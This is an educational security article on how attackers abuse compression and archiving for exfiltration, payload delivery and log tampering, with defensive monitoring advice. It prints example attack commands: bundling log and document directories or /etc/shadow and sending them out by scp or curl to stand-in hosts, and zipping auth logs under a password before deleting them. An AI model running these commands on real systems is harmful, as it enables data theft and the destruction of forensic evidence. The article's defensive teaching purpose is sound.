Compressing and Archiving: Friend, Foe, and Cybersecurity Threat

Compression and archiving are essential techniques in computing for reducing storage requirements and grouping files together. They are indispensable in legitimate IT operations, but like most tools, they can be weaponized in the wrong hands. Attackers use compression and archiving not just to save space but to hide, obfuscate, and smuggle data across network and security boundaries.

In this article, we will explore the fundamentals of compression and archiving, examine how adversaries exploit these methods during cyber attacks, and present defensive strategies to mitigate such threats. Real-world examples and code snippets will be provided to illustrate these concepts.

Understanding Compression and Archiving

Compression is the process of encoding data using fewer bits than the original representation. This is often achieved through algorithms like DEFLATE (used in ZIP), LZMA (used in 7z), or BZIP2. The primary goal is to reduce file size to save storage space or improve transfer speed.

Archiving, on the other hand, is the process of combining multiple files into a single container without necessarily compressing them. Formats like TAR (Tape Archive) bundle files together for easier management, and compression can be optionally applied on top of the archive.

For example, a .tar.gz file first archives (tar) and then compresses (gzip).

Legitimate Uses in IT

In normal IT operations, compression and archiving are used to:

Reduce storage costs.
Bundle related files for deployment or backup.
Transfer large datasets efficiently over the network.
Create package distributions for software.

These legitimate uses make compression tools such as tar, zip, and 7z ubiquitous in servers, desktops, and even embedded devices.

Weaponization in Cyber Attacks

The same properties that make compression useful in IT also make it appealing for malicious actors. In a cyber attack, compression and archiving are often used for data exfiltration, payload delivery, log manipulation, and defense evasion.

Data Exfiltration

Attackers often compress stolen files before exfiltration. This reduces the size of the transfer, making it faster, and can help avoid detection by combining many files into one. It also makes it harder for security tools to inspect the content in real time.

For example, after compromising a server, an attacker might execute:

tar -czf /tmp/reports.tar.gz /var/log /home/admin/Documents
scp /tmp/reports.tar.gz attacker@malicious-server.com:/data

In this scenario:

The tar command bundles and compresses sensitive directories.
The archive is then sent over SSH (scp) to an attacker-controlled server.

Payload Delivery

Attackers sometimes deliver malicious payloads inside compressed archives to bypass email filters or web proxies. Many detection systems scan the first level of compression but fail to analyze deeply nested archives.

An example malicious attachment could be a .zip file containing:

A disguised executable (invoice.pdf.exe).
Additional payloads in multi-layered .zip or .rar files.

Log and Evidence Manipulation

To cover tracks, attackers may compress logs before deletion or move them into password-protected archives to delay forensic investigation:

zip -P 123456 hidden_logs.zip /var/log/auth.log /var/log/syslog
rm /var/log/auth.log /var/log/syslog

Password-protected ZIP files make it harder for automated tools to inspect content without manual intervention.

Bypassing Content Filtering

Some Data Loss Prevention (DLP) solutions fail to inspect certain archive formats or large compressed files. Attackers exploit this by using uncommon formats such as .7z or .xz to wrap stolen data, slipping past security controls.

Red Team Perspective: Proof of Concept

A Red Team might demonstrate a data exfiltration proof-of-concept using publicly available tools. This simulation can help organizations understand the risks and validate detection capabilities.

Example: Simulating exfiltration with compression and transfer

# Compress sensitive files
tar -czf sensitive.tar.gz /etc/passwd /etc/shadow
 
# Transfer to external server
curl -X POST -F 'file=@sensitive.tar.gz' https://fileshare.example.com/upload

The goal here is to mimic a real attacker’s behavior, test logging and alerting mechanisms, and measure response time.

Blue Team Perspective: Defensive Measures

From a defensive standpoint, the goal is not to ban compression tools outright—this would cripple normal operations—but to detect suspicious usage and apply security controls.

Monitoring and Alerting

Security teams should monitor the execution of compression commands on sensitive systems. This includes:

Logging invocations of tar, zip, 7z, and similar tools.
Detecting large archive creations in sensitive directories.

On Linux, this can be achieved with auditd:

auditctl -w /usr/bin/tar -p x -k tar_usage
auditctl -w /usr/bin/zip -p x -k zip_usage

Content Inspection

Deploy tools that can inspect the content of archives at multiple levels of compression. Ensure your DLP or email gateway supports deep archive scanning and uncommon formats.

Rate Limiting and Network Controls

If possible, limit outbound transfers of large files and use TLS inspection to monitor compressed file uploads. Network segmentation can also limit where archives can be created and sent.

Educating Staff

End users and admins should understand that sending password-protected ZIP files to personal emails is risky. Training can help reduce accidental policy violations.

Case Study: APT Group Using Compression for Exfiltration

A real-world example involves the APT10 campaign, where attackers used custom tools to compress large volumes of stolen intellectual property into .rar files before exfiltrating them over HTTPS to avoid suspicion. By chunking the files and adding encryption inside the .rar, they bypassed both signature-based antivirus and content inspection tools.

Key Takeaways:

Compression and archiving are essential but easily abused.
Attackers use them for exfiltration, obfuscation, and bypassing detection.
Defenders should focus on monitoring, deep content inspection, and user education.
Real-world cases show that compression is a common element in advanced threats.

Conclusion

Compression and archiving are powerful double-edged swords. While they serve legitimate purposes in IT and software development, attackers exploit them to package and conceal malicious activity. Understanding the offensive potential of these tools allows defenders to design effective monitoring, detection, and response strategies.

Security teams must strike a balance between operational needs and security enforcement—restricting the misuse of compression utilities without disrupting legitimate workflows.